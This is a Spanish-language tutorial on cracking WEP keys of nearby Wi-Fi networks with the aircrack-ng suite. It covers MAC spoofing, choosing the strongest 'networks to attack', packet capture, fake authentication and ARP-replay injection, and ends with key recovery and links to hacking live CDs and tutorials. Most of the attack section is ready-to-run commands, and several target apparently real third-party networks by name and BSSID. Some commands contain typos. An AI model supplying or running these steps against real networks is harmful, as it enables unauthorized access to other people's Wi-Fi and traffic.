Sólo como ejercicio de red.
Para trabajar con las redes WIFI en Linux tenemos tres tipos de componentes:
- Capturadores: airodump-ng (del aircrack), kismet
- Inyectores de paqutes: aireplay (del aircrack), deauth (programa void11)
- Desencriptadores: aircrack, airdecap
airodump-ng
Sintaxis: airodump-ng [options] <interface name>
airodump-ng es un capturador de paquetes para porcesarlos con aircrack-ng.
Opciones:
-w cap prefijo del archivo a guardar (si no se pone sólo se muestra por pantalla)
-e guarda todos los beaconbs (anuncios de puntos de acceso) por defecto sólo guarda uno.
-i sólo captura IVs (vectores de inicialización) sólo para descubrir claves
-u <secs> segundos entre actualizaciones del display (útil para ornedores lentos)
–showack muestra estadísticas ACK/CTS/RTS, ayuda en el debugging y en la optimización de la inyección.
Ayuda a detectar estaciones ocultas
-h oculta estaciones encontradas con –showack
–berlin <secs> tiempo antes de eliminar el AP/cliente en pantalla cuando no se reciben más paqutes (def. 120 sec.)
-c <channel> indica los canales en los que escuchar, se pueden poner varios separados por comas
-b <abg> indica la banda (a, b o g) separados por comas
-s <method> define el modo que se configuran los canales (0,1 ó 2) cuando se usa más de una tarjeta
-r <file> lee datos desde un fichero
Hay más opciones de filtrado por pantalla no tratadas aquí.
Ejemplos:
# airodump-ng -w cap -e -i –showack eth1
Nota:
Los archivos se guardan en el directorio home (/root para user root) con los nombres cap-01.cap, cap-02.cap, etc.
aireplay-ng
aireplay-ng inyecta paquetes ARP-request dentro de una red wifi para generar tráfico
Sintaxis: aireplay-ng [options] <replay interface>
Opciones:
-b <bssid> nombre bssid de la red wifi en la que inyectar
-d <dmac> dirección MAC del destino
-s <smac> dirección MAC de origen
-m <len> longitud mínima de paquetes
-n <len> longitud máxima de paquetes
-u <type> trama de control, tipo de campo
-v <subt> trama de control, subtipo de campo
-t <tods> trama de control, bit DS «To»
-f <fromds> trama de control, bit DS «From»
TUTORIAL RAPIDO
1. cambiar nuestra MAC:
# ifconfig eth1 down
# ifconfig eth1 hw ether 00:11:22:33:44:55
# ifconfig eth1 up
2. Ver redes para atacar:
# airodump-ng eth1
Nos fijamos en las redes con mayor potencia (PWR)
3. lanzar captura del canal de la red que queremos atacar:
# airodump-ng eth1 -w [nombre_archivo] -c [canal]
# airodump-ng eth1 -w capturawifi -c 11
4. Inyectar paquetes:
Autenticar contra el AP:
aireplay-ng -1 0 -e [nombre_AP] -a [MAC_AP] -h [MAC_miWIFI] [Mi_Interfaz]
aireplay-ng -1 0 -e WebSTAR2 -a 00:1E:8C:0B:1D:1F -h 00:11:22:33:44:55 eth1
aireplay-ng -1 0 -e WLAN_CE -a 00:13:49:EB:93:3D -h 00-17-3F-71-88-38 rausb0
aireplay-ng -1 0 -e WebSTAR2 -a 00:1E:8C:0B:1D:1F -h 00-17-3F-71-88-38 rausb0
aireplay-ng -1 0 -e Netxan -a 00:14:A5:5F:80:0F -h 00-17-3F-71-88-38 rausb0
aireplay-ng -1 0 -e ALCON -a 00:21:27:EC:82:34 -h 00-17-3F-71-88-38 rausb0
aireplay-ng -1 0 -e MANE -a 00:50:7F:36:15:9D -h 00-17-3F-71-88-38 rausb0
aireplay-ng -1 0 -e Eladio -a 00:11:E3:D4:72:20 -h 00-17-3F-71-88-38 rausb0
Inyectar paquetes:
# airreplay-ng -3 -b [MAC_AP] -h 00:11:22:33:44:55 eth1
# airreplay-ng -3 -b 00:1E:8C:0B:1D:1F –h [MAC_miWIFI] [Mi_Interfaz]
(para desencriptar se necesitan 150.000 paquetes aprox. (columna #Data))
5. Desencriptar las claves
# aircrack-ng capturawifi*.cap
Aparece un listado de redes capturadas, seleccionamos el indice de la red atacada y esperamos el resultados.
Algunos enlaces útiles.
LIVE-CDS HACKING
http://download.wifislax.com:8080/wifislax-3.1.iso wifislax
http://www.idg.pl/ftp/linux_941/Troppix.1.2.html Troppix
http://remote-exploit.org/backtrack_download.html BackTrack
TUTORIALES
http://internet-gratis-facil.blogspot.com/
http://www.elhacker.net/hacking-wep-troppix.htm
LISTADOS TARJETAS WIFI
http://linux-wless.passys.nl/
http://hwagm.elhacker.net/htm/tarjetas.htm
http://www.aircrack-ng.org/doku.php?id=compatibility_drivers